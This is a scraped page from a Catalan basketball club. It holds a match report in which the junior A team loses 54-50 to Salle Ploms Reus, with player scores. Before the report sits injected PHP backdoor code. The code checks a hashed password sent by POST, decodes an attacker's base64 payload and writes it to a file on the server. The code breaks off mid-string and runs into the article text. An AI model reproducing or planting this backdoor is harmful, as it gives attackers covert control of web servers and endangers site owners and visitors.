function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Les pèrdues de pilota i la mala punteria condemnen el júnior masculí A - Tgn Bàsquet Club -

Les pèrdues de pilota i la mala punteria condemnen el júnior masculí A

Updated: octubre 28, 2013

El TGN Bàsquet va pagar molt car la seva falta d’encert en el tir (17/53 en tirs de dos) i les nombroses pilotes perdudes a la pista de la Salle Ploms. El conjunt lila, amb la baixa de Ferré, va sortir molt fort en defensa però amb el punt de mira desviat i fruit d’això va encaixar un parcial de 11-0 de sortida. Només la intensitat en l’últim minut del quart va permetre redreçarel camí tot i que la diferència encara era gran (20-11).

El segon període va ser un martiri. Les pilotes perdudes (33 al final del matx!) van ser aprofitades per l’equip local per poder anotar amb facilitat i al descans la diferència era de deu punts (34-24). El TGN Bàsquet va decidir aferrar-se a la seva defensa per intentar guanyar el partit i en el tercer període, els nois de Javier Vinader van deixar el seu rival en tan sols 7 punts i apropar-se en el marcador (41-39). L’últim quart va ser esperançador quan el conjunt lila es va situar 3 punts per davant del Ploms (47-50) però el desencert ofensiu en els últims minuts va permetre els locals fer una parcial de 7-0 i endur-se la victòria.

Diar Salle-Ploms Reus 54 / TGN Bàsquet 50

SALLE PLOMS: Torres (6), París (4), Cañete, Diallo (8) i Santacasilda (5) – cinc inicial – . Rabascall (10), Montero (2), Febrer (11), Garcia (5), Avila (3) i Balaguer. 4 triples (Febrer, Garcia, Avila i Santacasilda). 8/15 en tirs lliures. 21 faltes.

TGN BÀSQUET: Rodríguez, Gutiérrez (2), Artero (16), Montané (6) i Rofes (4)– cinc inicial – Martí (10),López (4), Bori (2),Tortajada (6), Puerto, Puigdomenech i Martín. 2 triples: 2 Artero. 10/19 en tirs lliures.  20 faltes.

Parcials: 20-11 / 14-13 / 7-15 / 13-11

Àrbitre: Belmonte, M.